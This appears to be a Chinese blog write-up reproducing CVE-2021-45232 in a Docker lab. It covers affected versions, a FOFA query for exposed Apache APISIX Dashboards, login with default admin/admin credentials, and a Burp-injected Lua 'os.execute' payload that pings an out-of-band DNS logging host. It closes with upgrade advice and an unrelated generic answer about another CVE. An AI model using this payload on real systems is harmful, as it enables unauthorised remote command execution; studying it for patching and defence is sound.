CVE-2021-45232 Apache-apisix-dashboard RCE复现

0x00 概述

Apache APISIX 是一个动态、实时、高性能的 API 网关, 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。Apache APISIX Dashboard 使用户可通过前端界面操作 Apache APISIX。

该漏洞的存在是由于 Manager API 中的错误。Manager API 在 gin 框架的基础上引入了 droplet 框架,所有的 API 和鉴权中间件都是基于 droplet 框架开发的。但是有些 API 直接使用了框架 gin 的接口,从而绕过身份验证。

0x01 影响版本

Apache APISIX Dashboard < 2.10.1

安全版本:Apache APISIX Dashboard >= 2.10.1

FOFA语句:title="Apache APISIX Dashboard"

0x02 环境搭建

git clone https://github.com/apache/apisix-docker
cd apisix-docker/example/
gedit docker-compose.yml     //修改两处版本号

ed8faf9f2ac1ac4f3b0b5d3e6b386047.png

docker-compose up -d

c92657fe02ce0da2eb6a32f7c3f90a88.png

访问IP:9000看到登录页面,环境部署完成。

527dd1af319f2dce8ba934cece295eb6.png

0x03 漏洞复现

dashborad创建好之后,默认端口9000进入web页面,admin/admin进入后台

点击上游,选择创建:

3d1bbfc6c23b0b66ec76440fc31e2cd1.png

名称,主机名,端口随便写,一直点下一步,最后提交:

abfbcea16f723dd3c356f02ced0bac42.png

首页点击路由,选择创建:

名称随便填,路径不用改

086867366f6022064e92f2c8209d4e40.png

563e75a8b41c9741d2d8bbd9e1be991a.png

设置上游服务器这里,选择我们刚才建立的123:

ab13d4b577038450645c48c44e284a48.png

这里只能选择我们新建的上游服务器,不能手动配置,否则后面添加script不成功。一直点下一步,点提交,最终可以在路由中看到我们新建的路由:

057d556756b22f0fa613279fcd7a4174.png

点击配置,一直点下一步,到提交时用burpsuite抓包拦截,添加"script":"os.execute('ping 5b7c3b38.dns.1433.eu.org')",

89b4d9a7bd8bdc6fe028c6afa1a103bc.png

到路由列表,路由的右侧有”更多”,下面有”查看”,可以查看我们的脚本:

ed39f13fbe54e36cb7cf24cc27d4430d.png

访问:http://172.16.71.140:9080/test会执行脚本里的命令,可以看到有dns请求。

6fa73271f7fcf6091ee5f63f6e46cc79.png

命令执行成功。

0x04 修复建议

官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,酌情升级至安全版本,并同时注意修改默认账户的账号密码;或可使用安全组等措施,通过白名单的方式限制访问的源IP,来临时缓解该漏洞。

长按下方图片关注我们:

641fbd7f90294d68dec9719adaeeb756.jpeg

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2021-28041是一个安全漏洞,它影响了某个软件或系统的特定版本。由于我无法得知你具体指的是哪个软件或系统的CVE-2021-28041漏洞,因此无法提供具体的步骤。但是,我可以给你一些一般性的漏洞的方法和建议。 要CVE-2021-28041漏洞,通常需要以下步骤: 1. 确定受影响的软件或系统版本:首先,你需要确定你使用的软件或系统是否受到CVE-2021-28041漏洞的影响。可以查看相关厂商或组织发布的安全公告或漏洞报告来获取这些信息。 2. 了解漏洞的详细信息:阅读CVE-2021-28041漏洞的详细描述和相关文档,了解漏洞的原理和影响范围。这将帮助你更好地理解漏洞,并为做好准备。 3. 搭建实验环境:在一个安全的环境中,搭建一个与受影响软件或系统版本相匹配的实验环境。这可以是一个虚拟机、容器或者专门用于安全测试的实验环境。 4. 漏洞:根据漏洞的描述和相关文档,尝试CVE-2021-28041漏洞。这可能涉及到构造特定的输入、触发特定的操作或者利用软件或系统中的某个弱点。 5. 验证漏洞:一旦成功漏洞,验证漏洞的存在和影响。这可以通过观察系统行为、获取敏感信息或者执行未授权的操作来进行验证。 请注意,漏洞是一项敏感的活动,需要在合法授权和合法范围内进行。在进行任何安全测试之前,请确保你已经获得了相关授权,并遵守法律和道德规范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值